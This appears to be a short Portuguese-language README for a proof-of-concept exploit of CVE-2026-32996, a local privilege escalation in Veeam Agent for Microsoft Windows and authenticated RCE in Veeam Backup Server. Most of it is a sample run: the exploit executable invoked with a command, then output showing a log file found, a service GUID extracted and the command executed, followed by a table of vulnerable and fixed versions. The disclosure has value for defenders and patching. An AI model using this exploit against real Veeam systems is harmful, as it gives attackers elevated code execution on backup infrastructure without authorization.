
Uma vulnerabilidade no Veeam Agent for Microsoft Windows permite a Escalação de Privilégios Local.
Execução Remota de Código (RCE) no Veeam Backup Server por um usuário de domínio autenticado.
Consulte o blog post para detalhes técnicos.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Versão | Status |
|---|---|
| 13.0.3.1220 | Totalmente corrigida. |
| 13.0.2.1102 e anteriores | Vulnerável. |